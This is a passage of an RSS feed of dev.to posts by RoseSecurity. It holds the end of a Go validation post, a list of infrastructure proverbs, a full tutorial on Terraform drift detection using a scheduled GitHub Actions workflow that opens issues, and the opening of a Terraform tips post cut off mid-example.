&lt;li&gt;Context must not be cancelled&lt;/li&gt;
&lt;li&gt;Method must not be empty&lt;/li&gt;
&lt;li&gt;Path must not be empty&lt;/li&gt;
&lt;li&gt;API key must be set&lt;/li&gt;
&lt;li&gt;API URL must be set&lt;/li&gt;
&lt;li&gt;HTTP client must exist&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That's not just validation; that's documentation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Happy Path Stays Clean
&lt;/h2&gt;

&lt;p&gt;Look at &lt;code&gt;newRequest&lt;/code&gt; again. After the two validation calls, the rest of the function is pure business logic. No defensive &lt;code&gt;if apiKey == ""&lt;/code&gt; checks scattered throughout. No &lt;code&gt;nil&lt;/code&gt; checks before every pointer access. The Roadhouse pattern front-loads the paranoia so the rest of your code can be confident and clean.&lt;/p&gt;

&lt;p&gt;Swayze would approve.&lt;/p&gt;




&lt;p&gt;If you hated this blog, feel free to drop some hateful issues and PRs on &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;my GitHub&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>go</category>
      <category>beginners</category>
      <category>backend</category>
    </item>
    <item>
      <title>Infra Proverbs</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Thu, 18 Dec 2025 15:48:15 +0000</pubDate>
      <link>https://dev.to/rosesecurity/infra-proverbs-1ljm</link>
      <guid>https://dev.to/rosesecurity/infra-proverbs-1ljm</guid>
      <description>&lt;h2&gt;
  
  
  &lt;em&gt;Simple, Clear, Maintainable&lt;/em&gt;
&lt;/h2&gt;




&lt;p&gt;Clear is better than clever.&lt;/p&gt;

&lt;p&gt;Automate the toil, not the thinking.&lt;/p&gt;

&lt;p&gt;If you can't see it, you can't fix it.&lt;/p&gt;

&lt;p&gt;Serve the workload, not the infrastructure.&lt;/p&gt;

&lt;p&gt;Today's shortcut is tomorrow's incident.&lt;/p&gt;

&lt;p&gt;An untested backup is no backup at all.&lt;/p&gt;

&lt;p&gt;Roll out in waves, not floods.&lt;/p&gt;

&lt;p&gt;Hope is not a strategy.&lt;/p&gt;

&lt;p&gt;Be careful what you measure, because that's exactly what you'll get.&lt;/p&gt;

&lt;p&gt;The best postmortem is the one you act on.&lt;/p&gt;

&lt;p&gt;Tribal knowledge dies with the tribe.&lt;/p&gt;

&lt;p&gt;The best infrastructure is the kind you can forget about.&lt;/p&gt;

</description>
      <category>infrastructureascode</category>
      <category>devops</category>
      <category>sre</category>
      <category>terraform</category>
    </item>
    <item>
      <title>Terraform Drift Detection Powered by GitHub Actions</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Wed, 17 Dec 2025 18:08:25 +0000</pubDate>
      <link>https://dev.to/rosesecurity/terraform-drift-detection-powered-by-github-actions-3akm</link>
      <guid>https://dev.to/rosesecurity/terraform-drift-detection-powered-by-github-actions-3akm</guid>
      <description>&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;TL;DR
Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Infrastructure drift happens when your cloud resources diverge from your Terraform state. Manual changes, console modifications, or other automation can silently alter infrastructure, leaving some serious blind spots and inconsistencies. Traditional drift detection generally involves complex, custom, or expensive solutions. &lt;a href="https://github.com/snyk/driftctl#this-project-is-now-in-maintenance-mode-we-cannot-promise-to-review-contributions-please-feel-free-to-fork-the-project-to-apply-any-changes-you-might-want-to-make" rel="noopener noreferrer"&gt;RIP &lt;code&gt;driftctl&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Simplicity of GitHub Actions
&lt;/h2&gt;

&lt;p&gt;I love GitHub Actions. They offer a native, cost-effective platform for automated drift detection. By leveraging Terraform's built-in exit codes and GitHub's issue tracking, we can build a robust drift detection system using only native features with no external services required. This approach works well for small-to-medium deployments. Larger-scale production use requires additional considerations like multi-account support, sensitive data sanitization, and automated remediation (I'll talk about that below).&lt;/p&gt;

&lt;h2&gt;
  
  
  The Workflow
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Triggers and Permissions
&lt;/h3&gt;

&lt;p&gt;The workflow runs on a daily schedule and supports manual execution via &lt;code&gt;workflow_dispatch&lt;/code&gt;. We configure OIDC (&lt;code&gt;id-token: write&lt;/code&gt;) for secure, keyless AWS authentication and grant permissions to create issues and pull requests for drift tracking.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Terraform Drift Detection&lt;/span&gt;

&lt;span class="c1"&gt;# We can also add some fancy logic to extract this from a Dockerfile&lt;/span&gt;
&lt;span class="c1"&gt;# or versions.tf so we don't have to continually monitor and bump this.&lt;/span&gt;
&lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;TF_VERSION&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;1.X.X&lt;/span&gt;

&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;workflow_dispatch&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;schedule&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;cron&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;00&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;6&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;*&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;*&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;*"&lt;/span&gt; &lt;span class="c1"&gt;# Every day at 06:00 UTC&lt;/span&gt;

&lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="c1"&gt;# This is required for requesting the JWT and opening issues&lt;/span&gt;
  &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;
  &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;
  &lt;span class="na"&gt;pull-requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;
  &lt;span class="na"&gt;issues&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Finding Root Modules
&lt;/h3&gt;

&lt;p&gt;This job dynamically discovers all Terraform root modules in the repository by searching for &lt;code&gt;.tf&lt;/code&gt; files while excluding module subdirectories and Terraform's cache. The &lt;code&gt;find&lt;/code&gt; command output is transformed into a JSON array using &lt;code&gt;jq&lt;/code&gt;, enabling parallel drift detection across multiple environments via matrix strategy. This may differ depending on your Terraform structure, but the general idea is to create a matrix of Terraform root modules that we can run &lt;code&gt;terraform plan&lt;/code&gt; against.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;find-terraform-envs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Find&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;Terraform&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;Directories'&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;outputs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;terraform-envs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ steps.fetch-environments.outputs.dirs }}&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Checkout code&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4.2.2&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Fetch Environments&lt;/span&gt;
        &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;fetch-environments&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;# Create a matrix of Terraform root modules&lt;/span&gt;
          &lt;span class="s"&gt;DIRS=$(find . -type f -name '*.tf' -not -path "*/modules/*" -not -path "*/.terraform/*" -exec dirname {} \; | sort -u | jq -R -s -c 'split("\n")[:-1]')&lt;/span&gt;
          &lt;span class="s"&gt;echo "dirs=$DIRS" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
          &lt;span class="s"&gt;echo "Found environments: $DIRS"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Credential Configuration and Setup
&lt;/h3&gt;

&lt;p&gt;The drift detection job runs in parallel for each discovered Terraform directory using a matrix strategy with &lt;code&gt;fail-fast: false&lt;/code&gt; to ensure one environment's failure doesn't block others. AWS credentials are configured via OIDC role assumption (no static keys), and Terraform is initialized with &lt;code&gt;terraform_wrapper: false&lt;/code&gt; to ensure clean exit code propagation. The OIDC in AWS takes some additional setup for this to work, but it's the recommended approach for secure, keyless authentication.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;  &lt;span class="na"&gt;drift-detection&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Drift&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;Detection'&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;needs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;find-terraform-envs&lt;/span&gt;
    &lt;span class="na"&gt;if&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;needs.find-terraform-envs.outputs.terraform-envs != '[]'&lt;/span&gt;
    &lt;span class="na"&gt;strategy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;fail-fast&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
      &lt;span class="na"&gt;matrix&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;tf_dir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ fromJson(needs.find-terraform-envs.outputs.terraform-envs) }}&lt;/span&gt;
    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Checkout code&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4.2.2&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Configure AWS Credentials&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aws-actions/configure-aws-credentials@v4.1.0&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;aws-region&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;us-east-1&lt;/span&gt;
          &lt;span class="na"&gt;role-to-assume&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ secrets.AWS_ROLE }}&lt;/span&gt;
          &lt;span class="na"&gt;role-session-name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Drift_Detection&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Set up Terraform&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hashicorp/setup-terraform@v3.1.2&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;terraform_version&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ env.TF_VERSION }}&lt;/span&gt;
          &lt;span class="na"&gt;terraform_wrapper&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Terraform Init&lt;/span&gt;
        &lt;span class="na"&gt;working-directory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ matrix.tf_dir }}&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;terraform init -input=false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Detecting Drift
&lt;/h3&gt;

&lt;p&gt;This is the core drift detection mechanism. The &lt;code&gt;terraform plan -detailed-exitcode&lt;/code&gt; returns exit codes: &lt;code&gt;0&lt;/code&gt; (no changes), &lt;code&gt;1&lt;/code&gt; (error), or &lt;code&gt;2&lt;/code&gt; (drift detected). We capture the actual Terraform exit code using &lt;code&gt;${PIPESTATUS[0]}&lt;/code&gt; rather than &lt;code&gt;$?&lt;/code&gt;, which would only return &lt;code&gt;sed&lt;/code&gt;'s exit code. The plan output is filtered and saved for issue creation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technical Note:&lt;/strong&gt; We use &lt;code&gt;set +e&lt;/code&gt; to prevent immediate failure, &lt;code&gt;-input=false&lt;/code&gt; to prevent hanging on interactive prompts, and &lt;code&gt;-lock-timeout=5m&lt;/code&gt; to handle state locks gracefully.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Terraform Drift Detection Plan&lt;/span&gt;
        &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;plan&lt;/span&gt;
        &lt;span class="na"&gt;working-directory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ matrix.tf_dir }}&lt;/span&gt;
        &lt;span class="na"&gt;shell&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bash&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;set +e # Disable exit on error for this step&lt;/span&gt;
          &lt;span class="s"&gt;terraform plan -detailed-exitcode -compact-warnings -no-color -input=false -lock-timeout=5m 2&amp;gt;&amp;amp;1 | sed -n '/Terraform will perform the following actions:/,$p' &amp;gt; plan_output.txt&lt;/span&gt;
          &lt;span class="s"&gt;EXIT_CODE=${PIPESTATUS[0]}&lt;/span&gt;
          &lt;span class="s"&gt;echo "exit_code=$EXIT_CODE" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
          &lt;span class="s"&gt;echo "EXIT_CODE=$EXIT_CODE" &amp;gt;&amp;gt; "$GITHUB_ENV"&lt;/span&gt;

          &lt;span class="s"&gt;# Show the plan output&lt;/span&gt;
          &lt;span class="s"&gt;cat plan_output.txt&lt;/span&gt;

          &lt;span class="s"&gt;# Set drift detected flag&lt;/span&gt;
          &lt;span class="s"&gt;if [ $EXIT_CODE -eq 2 ]; then&lt;/span&gt;
            &lt;span class="s"&gt;echo "drift_detected=true" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
            &lt;span class="s"&gt;echo "Drift detected in ${{ matrix.tf_dir }}"&lt;/span&gt;
          &lt;span class="s"&gt;elif [ $EXIT_CODE -eq 1 ]; then&lt;/span&gt;
            &lt;span class="s"&gt;echo "plan_failed=true" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;
            &lt;span class="s"&gt;echo "Plan failed in ${{ matrix.tf_dir }}"&lt;/span&gt;
          &lt;span class="s"&gt;else&lt;/span&gt;
            &lt;span class="s"&gt;echo "No drift detected in ${{ matrix.tf_dir }}"&lt;/span&gt;
          &lt;span class="s"&gt;fi&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Creating and Updating GitHub Issues
&lt;/h3&gt;

&lt;p&gt;When drift is detected (exit code 2), this step uses the GitHub API via &lt;code&gt;actions/github-script&lt;/code&gt; to create trackable issues. It reads the plan output, searches for existing open issues for the specific directory, and either updates the existing issue with a new comment or creates a fresh issue with appropriate labels. This ensures each Terraform directory has a single tracking issue that accumulates drift detections over time, providing an audit trail and preventing issue spam.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Security Note:&lt;/strong&gt; Terraform plan output may contain sensitive information such as resource IDs, internal IP addresses, or computed values. If your repository is public or your plan output includes sensitive data, consider implementing sanitization logic before creating issues, or restrict this workflow to private repositories with limited access. You may also want to use GitHub Actions secrets masking or filter the plan output to redact sensitive patterns.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Create or Update Issue on Drift Detection&lt;/span&gt;
        &lt;span class="na"&gt;if&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;steps.plan.outputs.drift_detected == 'true'&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/github-script@v7.0.1&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;script&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
            &lt;span class="s"&gt;const fs = require('fs');&lt;/span&gt;
            &lt;span class="s"&gt;const path = require('path');&lt;/span&gt;
            &lt;span class="s"&gt;let planOutput = '';&lt;/span&gt;
            &lt;span class="s"&gt;try {&lt;/span&gt;
              &lt;span class="s"&gt;planOutput = fs.readFileSync(path.join('${{ matrix.tf_dir }}', 'plan_output.txt'), 'utf8');&lt;/span&gt;
            &lt;span class="s"&gt;} catch (error) {&lt;/span&gt;
              &lt;span class="s"&gt;planOutput = 'Could not read plan output';&lt;/span&gt;
            &lt;span class="s"&gt;}&lt;/span&gt;

            &lt;span class="s"&gt;const title = `Terraform Drift Detected: ${{ matrix.tf_dir }}`;&lt;/span&gt;
            &lt;span class="s"&gt;const driftBody = `## Terraform Drift Detected&lt;/span&gt;
            &lt;span class="s"&gt;**Directory:** \`${{ matrix.tf_dir }}\`&lt;/span&gt;
            &lt;span class="s"&gt;**Detection Time:** ${new Date().toISOString()}&lt;/span&gt;
            &lt;span class="s"&gt;**Workflow:** [${context.runId}](${context.payload.repository.html_url}/actions/runs/${context.runId})&lt;/span&gt;
            &lt;span class="s"&gt;&amp;lt;details&amp;gt;&lt;/span&gt;
            &lt;span class="s"&gt;&amp;lt;summary&amp;gt;Plan Output&amp;lt;/summary&amp;gt;&lt;/span&gt;

            &lt;span class="s"&gt;\`\`\`&lt;/span&gt;
            &lt;span class="s"&gt;${planOutput}&lt;/span&gt;
            &lt;span class="s"&gt;\`\`\`&lt;/span&gt;

            &lt;span class="s"&gt;&amp;lt;/details&amp;gt;&lt;/span&gt;
            &lt;span class="s"&gt;Please review the changes and determine if they should be applied or if the Terraform configuration needs to be updated.`;&lt;/span&gt;

            &lt;span class="s"&gt;// Search for existing open drift issue for this directory&lt;/span&gt;
            &lt;span class="s"&gt;const issues = await github.rest.issues.listForRepo({&lt;/span&gt;
              &lt;span class="s"&gt;owner: context.repo.owner,&lt;/span&gt;
              &lt;span class="s"&gt;repo: context.repo.repo,&lt;/span&gt;
              &lt;span class="s"&gt;state: 'open',&lt;/span&gt;
              &lt;span class="s"&gt;labels: ['drift-detection']&lt;/span&gt;
            &lt;span class="s"&gt;});&lt;/span&gt;

            &lt;span class="s"&gt;const existingIssue = issues.data.find(issue =&amp;gt;&lt;/span&gt;
              &lt;span class="s"&gt;issue.title.includes('Terraform Drift Detected') &amp;amp;&amp;amp;&lt;/span&gt;
              &lt;span class="s"&gt;issue.title.includes('${{ matrix.tf_dir }}')&lt;/span&gt;
            &lt;span class="s"&gt;);&lt;/span&gt;

            &lt;span class="s"&gt;if (existingIssue) {&lt;/span&gt;
              &lt;span class="s"&gt;// Update existing issue with new drift info&lt;/span&gt;
              &lt;span class="s"&gt;await github.rest.issues.createComment({&lt;/span&gt;
                &lt;span class="s"&gt;owner: context.repo.owner,&lt;/span&gt;
                &lt;span class="s"&gt;repo: context.repo.repo,&lt;/span&gt;
                &lt;span class="s"&gt;issue_number: existingIssue.number,&lt;/span&gt;
                &lt;span class="s"&gt;body: `## New Drift Detected\n\n${driftBody}`&lt;/span&gt;
              &lt;span class="s"&gt;});&lt;/span&gt;

              &lt;span class="s"&gt;console.log(`Updated existing issue #${existingIssue.number}`);&lt;/span&gt;
            &lt;span class="s"&gt;} else {&lt;/span&gt;
              &lt;span class="s"&gt;// Create new issue&lt;/span&gt;
              &lt;span class="s"&gt;const newIssue = await github.rest.issues.create({&lt;/span&gt;
                &lt;span class="s"&gt;owner: context.repo.owner,&lt;/span&gt;
                &lt;span class="s"&gt;repo: context.repo.repo,&lt;/span&gt;
                &lt;span class="s"&gt;title: title,&lt;/span&gt;
                &lt;span class="s"&gt;body: driftBody,&lt;/span&gt;
                &lt;span class="s"&gt;labels: ['terraform', 'drift-detection', 'needs-review']&lt;/span&gt;
              &lt;span class="s"&gt;});&lt;/span&gt;

              &lt;span class="s"&gt;console.log(`Created new issue #${newIssue.data.number}`);&lt;/span&gt;
            &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Key Benefits
&lt;/h2&gt;

&lt;p&gt;This approach provides several engineering advantages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Zero External Dependencies&lt;/strong&gt;: No third-party SaaS tools or agents required&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Native Exit Code Logic&lt;/strong&gt;: Leverages Terraform's &lt;code&gt;detailed-exitcode&lt;/code&gt; for precise drift detection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parallel Execution&lt;/strong&gt;: Matrix strategy enables concurrent checks across multiple environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit Trail&lt;/strong&gt;: GitHub issues provide timestamped drift history and workflow run links&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure Authentication&lt;/strong&gt;: OIDC eliminates static credential management&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cost Effective&lt;/strong&gt;: Runs on GitHub Actions free tier for small to medium usage (note that larger deployments with many Terraform directories may exceed free tier limits)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The workflow scales horizontally as you add Terraform directories and provides immediate visibility into infrastructure changes through your existing issue tracking system.&lt;/p&gt;

&lt;h2&gt;
  
  
  Considerations for Production Use
&lt;/h2&gt;

&lt;p&gt;While this workflow provides solid drift detection, you may want to enhance it for production environments:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Account Support&lt;/strong&gt;: This example uses a single AWS role. For multi-account setups, consider using a matrix strategy with account-specific roles or dynamic role selection based on directory structure&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sensitive Data Handling&lt;/strong&gt;: Implement plan output sanitization if your infrastructure includes secrets or sensitive configuration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Issue Lifecycle Management&lt;/strong&gt;: Add automation to close issues when drift is resolved or implement a reconciliation step to verify fixes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;State Lock Handling&lt;/strong&gt;: The &lt;code&gt;-lock-timeout=5m&lt;/code&gt; provides basic protection, but consider monitoring for persistent lock issues that may indicate state corruption or concurrent modifications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Error Notification&lt;/strong&gt;: Consider adding Slack/email notifications for plan failures in addition to GitHub issues&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;If you liked (or hated) this blog, feel free to check out my &lt;a href="https://github.com/RoseSecurity" rel="noopener noreferrer"&gt;GitHub&lt;/a&gt;!&lt;/p&gt;

</description>
      <category>terraform</category>
      <category>infrastructureascode</category>
      <category>github</category>
      <category>githubactions</category>
    </item>
    <item>
      <title>Terraform Tips from the IaC Trenches</title>
      <dc:creator>RoseSecurity</dc:creator>
      <pubDate>Tue, 16 Dec 2025 14:31:00 +0000</pubDate>
      <link>https://dev.to/rosesecurity/terraform-tips-from-the-iac-trenches-ipd</link>
      <guid>https://dev.to/rosesecurity/terraform-tips-from-the-iac-trenches-ipd</guid>
      <description>&lt;p&gt;After a few years of writing open-source Terraform modules, I've picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren't revolutionary, but they're simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I've seen in the wild, these techniques seem to be underutilized.&lt;/p&gt;




&lt;h2&gt;
  
  
  Use &lt;code&gt;one()&lt;/code&gt; for Safer Conditional Resource References
&lt;/h2&gt;

&lt;p&gt;When you conditionally create resources with &lt;code&gt;count&lt;/code&gt;, don't reach for &lt;code&gt;[0]&lt;/code&gt; — use &lt;code&gt;one()&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Problem
&lt;/h3&gt;

&lt;p&gt;It's common to use &lt;code&gt;count&lt;/code&gt; with a boolean to conditionally create resources (especially in open-source modules that accommodate a lot of different configuration settings):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="nx"&gt;data&lt;/span&gt; &lt;span class="s2"&gt;"aws_route53_zone"&lt;/span&gt; &lt;span class="s2"&gt;"this"&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
